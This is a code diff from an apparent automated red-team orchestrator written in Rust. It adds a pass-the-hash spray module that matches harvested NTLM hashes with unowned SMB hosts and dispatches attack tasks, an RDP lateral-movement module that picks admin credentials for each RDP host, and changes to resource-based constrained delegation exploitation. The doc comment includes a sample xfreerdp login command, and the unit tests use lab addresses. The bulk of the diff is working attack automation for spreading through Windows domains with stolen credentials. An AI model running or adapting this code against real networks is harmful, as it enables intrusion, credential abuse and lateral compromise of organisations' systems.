+
+ let work: Vec<PthWork> = {
+ let state = dispatcher.state.read().await;
+ match collect_pth_work(&state) {
+ Some(items) => items,
+ None => continue,
+ }
+ };
+
+ // Limit to 5 per cycle to avoid overwhelming the throttler
+ for item in work.into_iter().take(5) {
+ let payload = json!({
+ "technique": "pass_the_hash",
+ "target_ip": item.target_ip,
+ "hostname": item.hostname,
+ "username": item.username,
+ "ntlm_hash": item.ntlm_hash,
+ "domain": item.domain,
+ "protocol": "smb",
+ });
+
+ let priority = dispatcher.effective_priority("pth_spray");
+ match dispatcher
+ .throttled_submit("lateral", "lateral", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ host = %item.target_ip,
+ user = %item.username,
+ "PTH spray dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_PTH_SPRAY, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_PTH_SPRAY, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(host = %item.target_ip, "PTH spray deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, host = %item.target_ip, "Failed to dispatch PTH spray");
+ }
+ }
+ }
+ }
+}
+
+/// Collects PTH spray work items from state. Returns `None` when there are no
+/// NTLM hashes (caller should skip the cycle).
+fn collect_pth_work(state: &StateInner) -> Option<Vec<PthWork>> {
+ // Need NTLM hashes
+ let ntlm_hashes: Vec<_> = state
+ .hashes
+ .iter()
+ .filter(|h| {
+ h.hash_type.to_lowercase().contains("ntlm")
+ && !h.hash_value.is_empty()
+ && h.hash_value.len() == 32
+ })
+ .collect();
+
+ if ntlm_hashes.is_empty() {
+ return None;
+ }
+
+ let mut items = Vec::new();
+
+ // For each non-owned host, try PTH with available NTLM hashes
+ for host in &state.hosts {
+ if host.owned {
+ continue;
+ }
+
+ // Check if host has SMB (port 445)
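+ // Note: the substring match is loose (any service string mentioning
+ // 445/smb/cifs counts), so an occasional false positive is possible;
+ // it only costs one spray attempt.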
+ let has_smb = host.services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ if !has_smb {
+ continue;
+ }
+
+ // Try each unique NTLM hash against this host
+ for hash in &ntlm_hashes {
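+ // Key on the first 8 hex chars of the hash: short, but enough to
+ // distinguish distinct hashes. The `[..8]` slice below cannot
+ // panic because the filter above only admits 32-char values.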
+ let dedup_key = format!(
+ "pth:{}:{}:{}",
+ host.ip,
+ hash.username.to_lowercase(),
+ &hash.hash_value[..8]
+ );
+ if state.is_processed(DEDUP_PTH_SPRAY, &dedup_key) {
+ continue;
+ }
+
+ // Infer domain from hash or host
+ let domain = if !hash.domain.is_empty() {
+ hash.domain.clone()
+ } else {
+ host.hostname
+ .find('.')
+ .map(|i| host.hostname[i + 1..].to_string())
+ .unwrap_or_default()
+ };
+
+ items.push(PthWork {
+ dedup_key,
+ target_ip: host.ip.clone(),
+ hostname: host.hostname.clone(),
+ username: hash.username.clone(),
+ ntlm_hash: hash.hash_value.clone(),
+ domain,
+ });
+ }
+ }
+
+ Some(items)
+}
+
+struct PthWork {
+ dedup_key: String,
+ target_ip: String,
+ hostname: String,
+ username: String,
+ ntlm_hash: String,
+ domain: String,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use ares_core::models::{Hash, Host};
+
+ fn make_ntlm_hash(username: &str, hash_value: &str, domain: &str) -> Hash {
+ Hash {
+ id: format!("hash-{username}"),
+ username: username.to_string(),
+ hash_value: hash_value.to_string(),
+ hash_type: "NTLM".to_string(),
+ domain: domain.to_string(),
+ cracked_password: None, // pragma: allowlist secret
+ source: "secretsdump".to_string(),
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ aes_key: None,
+ }
+ }
+
+ fn make_smb_host(ip: &str, hostname: &str, owned: bool) -> Host {
+ Host {
+ ip: ip.to_string(),
+ hostname: hostname.to_string(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: vec!["445/tcp microsoft-ds".to_string()],
+ is_dc: false,
+ owned,
+ }
+ }
+
+ fn make_host_no_smb(ip: &str, hostname: &str) -> Host {
+ Host {
+ ip: ip.to_string(),
+ hostname: hostname.to_string(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: vec!["80/tcp http".to_string()],
+ is_dc: false,
+ owned: false,
+ }
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("pth:{}:{}:{}", "192.168.58.10", "admin", "aabbccdd");
+ assert_eq!(key, "pth:192.168.58.10:admin:aabbccdd");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_PTH_SPRAY, "pth_spray");
+ }
+
+ #[test]
+ fn ntlm_hash_filter_valid() {
+ let hash_type = "NTLM";
+ let hash_value = "aad3b435b51404eeaad3b435b51404ee";
+ assert!(hash_type.to_lowercase().contains("ntlm"));
+ assert!(!hash_value.is_empty());
+ assert_eq!(hash_value.len(), 32);
+ }
+
+ #[test]
+ fn ntlm_hash_filter_rejects_short() {
+ let hash_value = "abc123";
+ assert_ne!(hash_value.len(), 32);
+ }
+
+ #[test]
+ fn ntlm_hash_filter_rejects_empty() {
+ let hash_value = "";
+ assert!(hash_value.is_empty());
+ }
+
+ #[test]
+ fn ntlm_hash_filter_rejects_non_ntlm() {
+ let hash_type = "aes256-cts-hmac-sha1-96";
+ assert!(!hash_type.to_lowercase().contains("ntlm"));
+ }
+
+ #[test]
+ fn smb_service_detection() {
+ let services = ["445/tcp microsoft-ds".to_string()];
+ let has_smb = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ assert!(has_smb);
+ }
+
+ #[test]
+ fn no_smb_service() {
+ let services = ["80/tcp http".to_string()];
+ let has_smb = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ assert!(!has_smb);
+ }
+
+ #[test]
+ fn domain_from_hash_preferred() {
+ let hash_domain = "contoso.local";
+ let hostname = "srv01.fabrikam.local";
+ let domain = if !hash_domain.is_empty() {
+ hash_domain.to_string()
+ } else {
+ hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_string())
+ .unwrap_or_default()
+ };
+ assert_eq!(domain, "contoso.local");
+ }
+
+ #[test]
+ fn domain_fallback_to_hostname() {
+ let hash_domain = "";
+ let hostname = "srv01.fabrikam.local";
+ let domain = if !hash_domain.is_empty() {
+ hash_domain.to_string()
+ } else {
+ hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_string())
+ .unwrap_or_default()
+ };
+ assert_eq!(domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn dedup_key_uses_hash_prefix() {
+ let ip = "192.168.58.10";
+ let username = "Admin";
+ let hash_value = "aad3b435b51404eeaad3b435b51404ee";
+ let dedup_key = format!(
+ "pth:{}:{}:{}",
+ ip,
+ username.to_lowercase(),
+ &hash_value[..8]
+ );
+ assert_eq!(dedup_key, "pth:192.168.58.10:admin:aad3b435");
+ }
+
+ #[test]
+ fn ntlm_hash_filter_exact_32() {
+ let hash = "a".repeat(32);
+ assert_eq!(hash.len(), 32);
+ assert!(!hash.is_empty());
+ }
+
+ #[test]
+ fn ntlm_hash_type_variations() {
+ for t in ["NTLM", "ntlm", "NT", "ntlm_hash"] {
+ assert!(t.to_lowercase().contains("ntlm") || t.to_lowercase().contains("nt"));
+ }
+ }
+
+ #[test]
+ fn smb_service_detection_cifs() {
+ let services = ["cifs".to_string()];
+ let has_smb = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ assert!(has_smb);
+ }
+
+ #[test]
+ fn pth_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "pass_the_hash",
+ "target_ip": "192.168.58.22",
+ "hostname": "srv01.contoso.local",
+ "username": "admin",
+ "ntlm_hash": "aad3b435b51404eeaad3b435b51404ee",
+ "domain": "contoso.local",
+ "protocol": "smb",
+ });
+ assert_eq!(payload["technique"], "pass_the_hash");
+ assert_eq!(payload["protocol"], "smb");
+ assert_eq!(payload["ntlm_hash"], "aad3b435b51404eeaad3b435b51404ee");
+ }
+
+ #[test]
+ fn pth_work_construction() {
+ let work = PthWork {
+ dedup_key: "pth:192.168.58.22:admin:aad3b435".into(),
+ target_ip: "192.168.58.22".into(),
+ hostname: "srv01.contoso.local".into(),
+ username: "admin".into(),
+ ntlm_hash: "aad3b435b51404eeaad3b435b51404ee".into(),
+ domain: "contoso.local".into(),
+ };
+ assert_eq!(work.username, "admin");
+ assert_eq!(work.ntlm_hash.len(), 32);
+ }
+
+ #[test]
+ fn domain_fallback_bare_hostname() {
+ let hash_domain = "";
+ let hostname = "srv01";
+ let domain = if !hash_domain.is_empty() {
+ hash_domain.to_string()
+ } else {
+ hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_string())
+ .unwrap_or_default()
+ };
+ assert_eq!(domain, "");
+ }
+
+ #[test]
+ fn take_5_limiting() {
+ let items: Vec<i32> = (0..20).collect();
+ let taken: Vec<_> = items.into_iter().take(5).collect();
+ assert_eq!(taken.len(), 5);
+ }
+
+ // --- collect_pth_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_none() {
+ let state = StateInner::new("test".into());
+ assert!(collect_pth_work(&state).is_none());
+ }
+
+ #[test]
+ fn collect_no_hashes_returns_none() {
+ let mut state = StateInner::new("test".into());
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ assert!(collect_pth_work(&state).is_none());
+ }
+
+ #[test]
+ fn collect_hashes_no_hosts_returns_empty() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ let work = collect_pth_work(&state).unwrap();
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_hash_and_smb_host_produces_work() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.10");
+ assert_eq!(work[0].username, "admin");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].ntlm_hash, "aad3b435b51404eeaad3b435b51404ee");
+ }
+
+ #[test]
+ fn collect_skips_owned_hosts() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state.hosts.push(make_smb_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ true, // owned
+ ));
+ let work = collect_pth_work(&state).unwrap();
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_skips_non_smb_hosts() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_host_no_smb("192.168.58.20", "web01.contoso.local"));
+ let work = collect_pth_work(&state).unwrap();
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_skips_dedup_processed() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ // Mark as already processed
+ state.mark_processed(
+ DEDUP_PTH_SPRAY,
+ "pth:192.168.58.10:admin:aad3b435".to_string(),
+ );
+ let work = collect_pth_work(&state).unwrap();
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_filters_non_ntlm_hashes() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(Hash {
+ id: "hash-aes".into(),
+ username: "admin".into(),
+ hash_value: "abcdef1234567890abcdef1234567890".into(), // pragma: allowlist secret
+ hash_type: "aes256-cts-hmac-sha1-96".into(),
+ domain: "contoso.local".into(),
+ cracked_password: None, // pragma: allowlist secret
+ source: "secretsdump".into(),
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ aes_key: None,
+ });
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ // AES hash type should be rejected
+ assert!(collect_pth_work(&state).is_none());
+ }
+
+ #[test]
+ fn collect_filters_short_hash_values() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435", // too short, not 32 chars - pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ assert!(collect_pth_work(&state).is_none());
+ }
+
+ #[test]
+ fn collect_filters_empty_hash_values() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "", // empty - pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ assert!(collect_pth_work(&state).is_none());
+ }
+
+ #[test]
+ fn collect_domain_fallback_from_hostname() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "", // empty domain on hash
+ ));
+ state.hosts.push(make_smb_host(
+ "192.168.58.10",
+ "srv01.fabrikam.local",
+ false,
+ ));
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_domain_fallback_bare_hostname_empty() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "", // empty domain on hash
+ ));
+ state.hosts.push(make_smb_host(
+ "192.168.58.10",
+ "srv01", // no dot, no domain part
+ false,
+ ));
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "");
+ }
+
+ #[test]
+ fn collect_multiple_hashes_multiple_hosts() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state.hashes.push(make_ntlm_hash(
+ "svcacct",
+ "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.20", "srv02.contoso.local", false));
+ let work = collect_pth_work(&state).unwrap();
+ // 2 hashes x 2 hosts = 4 work items
+ assert_eq!(work.len(), 4);
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercases_username() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "Administrator",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ assert!(work[0].dedup_key.contains(":administrator:"));
+ }
+
+ #[test]
+ fn collect_mixed_owned_and_unowned_hosts() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state.hosts.push(make_smb_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ true, // owned
+ ));
+ state.hosts.push(make_smb_host(
+ "192.168.58.20",
+ "srv02.contoso.local",
+ false, // not owned
+ ));
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.20");
+ }
+
+ #[test]
+ fn collect_mixed_smb_and_non_smb_hosts() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_host_no_smb("192.168.58.10", "web01.contoso.local"));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.20", "srv01.contoso.local", false));
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.20");
+ }
+
+ #[test]
+ fn collect_smb_detection_via_smb_string() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state.hosts.push(Host {
+ ip: "192.168.58.10".into(),
+ hostname: "srv01.contoso.local".into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: vec!["SMB".to_string()],
+ is_dc: false,
+ owned: false,
+ });
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ }
+
+ #[test]
+ fn collect_smb_detection_via_cifs_string() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state.hosts.push(Host {
+ ip: "192.168.58.10".into(),
+ hostname: "srv01.contoso.local".into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: vec!["cifs/srv01.contoso.local".to_string()],
+ is_dc: false,
+ owned: false,
+ });
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ }
+
+ #[test]
+ fn collect_partial_dedup_only_skips_processed() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state.hashes.push(make_ntlm_hash(
+ "svcacct",
+ "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ // Mark only admin as processed
+ state.mark_processed(
+ DEDUP_PTH_SPRAY,
+ "pth:192.168.58.10:admin:aad3b435".to_string(),
+ );
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].username, "svcacct");
+ }
+
+ #[test]
+ fn collect_hostname_preserved_in_work() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "dc01.contoso.local", false));
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work[0].hostname, "dc01.contoso.local");
+ }
+
+ #[test]
+ fn collect_hash_domain_preferred_over_hostname_domain() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(make_ntlm_hash(
+ "admin",
+ "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+ "contoso.local",
+ ));
+ state.hosts.push(make_smb_host(
+ "192.168.58.10",
+ "srv01.fabrikam.local",
+ false,
+ ));
+ let work = collect_pth_work(&state).unwrap();
+ // Hash domain takes priority over hostname domain
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_ntlm_hash_type_case_insensitive() {
+ let mut state = StateInner::new("test".into());
+ state.hashes.push(Hash {
+ id: "hash-1".into(),
+ username: "admin".into(),
+ hash_value: "aad3b435b51404eeaad3b435b51404ee".into(), // pragma: allowlist secret
+ hash_type: "Ntlm".into(), // mixed case
+ domain: "contoso.local".into(),
+ cracked_password: None, // pragma: allowlist secret
+ source: "secretsdump".into(),
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ aes_key: None,
+ });
+ state
+ .hosts
+ .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+ let work = collect_pth_work(&state).unwrap();
+ assert_eq!(work.len(), 1);
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/rbcd.rs b/ares-cli/src/orchestrator/automation/rbcd.rs
index b28228c6..5f487a75 100644
--- a/ares-cli/src/orchestrator/automation/rbcd.rs
+++ b/ares-cli/src/orchestrator/automation/rbcd.rs
@@ -14,6 +14,7 @@ use serde_json::json;
use tokio::sync::watch;
use tracing::{debug, info, warn};
+use crate::dedup::is_ghost_machine_account;
use crate::orchestrator::dispatcher::Dispatcher;
/// Dedup key prefix for RBCD attacks.
@@ -91,6 +92,14 @@ pub async fn auto_rbcd_exploitation(
.or_else(|| vuln.details.get("victim"))
.and_then(|v| v.as_str())
.map(|s| s.to_string())?;
+ if is_ghost_machine_account(&target_computer) {
+ debug!(
+ vuln_id = %vuln.vuln_id,
+ target = %target_computer,
+ "RBCD skipped: ghost machine account target"
+ );
+ return None;
+ }
let domain = vuln
.details
@@ -99,28 +108,14 @@ pub async fn auto_rbcd_exploitation(
.unwrap_or("")
.to_string();
- // Find credential for the source user
- let credential = state
- .credentials
- .iter()
- .find(|c| {
- c.username.to_lowercase() == source_user.to_lowercase()
- && (domain.is_empty()
- || c.domain.to_lowercase() == domain.to_lowercase())
- })
- .cloned();
-
+ // Find credential for the source user. Cross-forest ACL
+ // edges (e.g. leo@contoso → sql01$@fabrikam) put the
+ // source user in a different domain than the vuln's `domain`
+ // field (which is the target's domain), so we cannot
+ // domain-restrict against the target.
+ let credential = state.find_source_credential(&source_user, &domain);
let hash = if credential.is_none() {
- state
- .hashes
- .iter()
- .find(|h| {
- h.username.to_lowercase() == source_user.to_lowercase()
- && h.hash_type.to_uppercase() == "NTLM"
- && (domain.is_empty()
- || h.domain.to_lowercase() == domain.to_lowercase())
- })
- .cloned()
+ state.find_source_hash(&source_user, &domain)
} else {
None
};
@@ -296,6 +291,11 @@ mod tests {
assert!(!is_rbcd_candidate("shadow_credentials", Some("Computer")));
}
+ #[test]
+ fn ghost_machine_target_detected() {
+ assert!(is_ghost_machine_account("WIN-DPPJMLU3XS6$"));
+ }
+
#[test]
fn resolve_computer_ip_exact_match() {
let hosts = vec![
diff --git a/ares-cli/src/orchestrator/automation/rdp_lateral.rs b/ares-cli/src/orchestrator/automation/rdp_lateral.rs
new file mode 100644
index 00000000..5c984dce
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/rdp_lateral.rs
@@ -0,0 +1,716 @@
+//! auto_rdp_lateral -- RDP lateral movement to hosts with port 3389.
+//!
+//! Targets hosts with RDP service (port 3389) that are not yet owned.
+//! Uses xfreerdp or similar tooling to authenticate and execute commands
+//! via RDP, complementing WinRM lateral movement for hosts that only
+//! expose RDP.
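+//!
+//! Illustrative shape of a worker-side authentication check (a hedged
+//! sketch; the worker owns the real command, and flags can differ by
+//! FreeRDP version):
+//!
+//! ```text
+//! xfreerdp /v:192.168.58.22 /u:admin /p:'P@ssw0rd!' /d:contoso.local +auth-only /cert:ignore
+//! ```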
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// RDP lateral movement to hosts with port 3389.
+/// Interval: 45s.
+pub async fn auto_rdp_lateral(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("rdp_lateral") {
+ continue;
+ }
+
+ let work: Vec<RdpWork> = {
+ let state = dispatcher.state.read().await;
+ collect_rdp_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "rdp_lateral",
+ "target_ip": item.host_ip,
+ "hostname": item.hostname,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("rdp_lateral");
+ match dispatcher
+ .throttled_submit("lateral", "lateral", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ host = %item.host_ip,
+ hostname = %item.hostname,
+ "RDP lateral movement dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_RDP_LATERAL, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_RDP_LATERAL, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(host = %item.host_ip, "RDP lateral deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, host = %item.host_ip, "Failed to dispatch RDP lateral");
+ }
+ }
+ }
+ }
+}
+
+/// Collect RDP lateral movement work items from current state.
+///
+/// Extracted from the async loop for testability.
+fn collect_rdp_work(state: &crate::orchestrator::state::StateInner) -> Vec<RdpWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for host in &state.hosts {
+ // Skip already-owned hosts
+ if host.owned {
+ continue;
+ }
+
+ // Check for RDP service (port 3389)
+ let has_rdp = host.services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("3389") || sl.contains("rdp")
+ });
+ if !has_rdp {
+ continue;
+ }
+
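+ // Unlike pth_spray (keyed per host+user+hash), RDP dedup is
+ // per-host: at most one credential attempt per host per operation.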
+ let dedup_key = format!("rdp:{}", host.ip);
+ if state.is_processed(DEDUP_RDP_LATERAL, &dedup_key) {
+ continue;
+ }
+
+ // Infer domain from hostname
+ let domain = host
+ .hostname
+ .find('.')
+ .map(|i| host.hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+
+ // Find admin credential for this domain
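+ // Credentials quarantined by the state layer (see
+ // `is_credential_quarantined`) are skipped in both passes.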
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| {
+ c.is_admin
+ && !c.password.is_empty()
+ && (domain.is_empty() || c.domain.to_lowercase() == domain)
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .or_else(|| {
+ // Fall back to any credential with a password
+ state.credentials.iter().find(|c| {
+ !c.password.is_empty()
+ && (domain.is_empty() || c.domain.to_lowercase() == domain)
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ })
+ .cloned();
+
+ let cred = match cred {
+ Some(c) => c,
+ None => continue,
+ };
+
+ items.push(RdpWork {
+ dedup_key,
+ host_ip: host.ip.clone(),
+ hostname: host.hostname.clone(),
+ domain,
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+struct RdpWork {
+ dedup_key: String,
+ host_ip: String,
+ hostname: String,
+ domain: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::SharedState;
+ use ares_core::models::{Credential, Host};
+
+ fn make_credential(username: &str, password: &str, domain: &str, is_admin: bool) -> Credential {
+ Credential {
+ id: format!("c-{}", username),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_host(ip: &str, hostname: &str, services: Vec<String>, owned: bool) -> Host {
+ Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services,
+ is_dc: false,
+ owned,
+ }
+ }
+
+ #[tokio::test]
+ async fn collect_empty_state_returns_no_work() {
+ let shared = SharedState::new("test-op".into());
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_no_credentials_returns_no_work() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_host_with_rdp_and_admin_cred() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].host_ip, "192.168.58.10");
+ assert_eq!(work[0].hostname, "srv01.contoso.local");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].credential.username, "admin");
+ assert!(work[0].credential.is_admin);
+ }
+
+ #[tokio::test]
+ async fn collect_host_without_rdp_skipped() {
+ let shared = SharedState::new("test-op".into());
+ {
